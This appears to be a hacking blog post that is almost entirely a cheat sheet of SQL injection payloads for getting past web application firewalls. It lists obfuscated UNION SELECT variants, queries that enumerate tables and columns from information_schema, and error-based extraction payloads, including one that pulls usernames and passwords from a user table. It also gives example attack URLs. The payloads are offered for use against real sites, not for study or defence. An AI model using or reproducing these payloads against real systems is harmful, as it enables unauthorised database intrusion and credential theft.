Bypass WAF SQL Injection

This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If you don't know sql injection you can learn it HERE

Union Select :

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) /*!50000union*/+/*!50000select*/ UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/*!select*/+1,2,3 union/**/select/**/1,2,3 uni%20union%20/*!select*/%20 /**//*!union*//**//*!select*//**/ union%23aa%0Aselect /**/union/*!50000select*/ /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt+ +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all sel<ect /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel&ect +un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a

Buffer Overflow

+And(select 1)=(select 0×414)+union+select+1– +And(select 1)=(select 0xAAAA)+union+select+1– +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+ +and (/*!select*/ 1)=(/*!select*/ 0xAA)+

400 Bad Request

–+%0A union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –

Group_Concat

Group_Concat() /*!group_concat*/() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~%22%29 CoNcAt() CONCAT(DISTINCT Version()) concat(,0x3a,) concat() CoNcAt() /*!50000cOnCat*/(/*!Version()*/) /*!50000cOnCat*/ /**//*!12345cOnCat*/(,0x3a,) concat_ws() concat(0x3a,,0x3c62723e) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3a3a,version() CONCAT_WS(CHAR(32,58,32),version(),) REVERSE(tacnoc) binary(version()) uncompress(compress(version())) aes_decrypt(aes_encrypt(version(),1),1)

To Appear Column numbr in page put after id

id=1+and+1=0+union+select+1,2,3,4,5,6 +AND+1=0 /*!aND*/ 1 like 0 +/*!and*/+1=0 +and+2>3+ +and(1)=(0) and (1)!=(0) +div+0 Having+1=0

Tables

group_concat(/*!table_name*/) +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– - /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -

Columns

group_concat(/*!column_name*/) +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!froM*/ table– -

Function ByPassing

unhex(hex(value)) cast(value as char) uncompress(compress(version())) cast(version() as char) aes_decrypt(aes_encrypt(version(),1),1) binary(version()) convert(value using ascii)

Avoid Source Page Injection

concat(? >,<br><br><br>,@@version,?<img src= ,?<? #) ><br>? <img src= <img src= />injection<img src= concat(0x223e,@@version)concat(0x273e27,version(),0x3c212d2d)concat(0x223e3c62723e,version(),0x3c696d67207372633d22)concat(0x223e,@@version,0x3c696d67207372633d22)concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)concat(0x223e3c62723e,@@version,0x3a, BlackRose ,0x3c696d67207372633d22)concat( </title> ,@@version, <title> )concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)

Get Version - DB_NAME - User - HOST_NAME - DataDir

version() convert(version() using latin1) unhex(hex(version())) @@GLOBAL.VERSION (substr(@@version,1,1)=5) :: 1 true 0 fals # like # http://localhost/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 – +and substring(version(),1,1)=4 +and substring(version(),1,1)=5 +and substring(version(),1,1)=9 +and substring(version(),1,1)=10 id=1 /*!50094aaaa*/ error id=1 /*!50095aaaa*/ no error id=1 /*!50096aaaa*/ error # like # http://localhost/page.php?id=13 /*!50095aaaa*/ id=1 /*!40123 1=1*/–+- no error id=1 /*!40122rrrr*/ no error # like # http://localhost/page.php?id=13 /*!40122rrrr*/ error not v4

DB_NAME

@@database database() id=vv() # like # http://localhost/page.php?id=-13 union select 1,2,DB_NAME(),4,5 – http://localhost/page.php?id=vv%28%29 @@user user() user_name() system_user() # like # http://localhost/page.php?id=-13 union select 1,2,user(),4,5 – HOST_NAME() @@hostname @@servername SERVERPROPERTY() # like # http://localhost/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 – @@datadir datadir() # like # http://localhost/page.php?id=-13 union select 1,2,datadir(),4,5 – ASPX and 1=0/@@version ‘ and 1=0/@@version;– ‘) and 1=@@version– and 1=0/user;–

Error Based

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150) from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– - or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — - and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))) +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x or 1=convert(int,(@@version))- +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-

Press "CTRL+D" For Save This Site As a Bookmarks and Enjoy This Site :)

Bypass WAF SQL Injection

0 Response to "Bypass WAF SQL Injection"

Welcome To AnSaRiTrixs

Blog Archive

Contact Me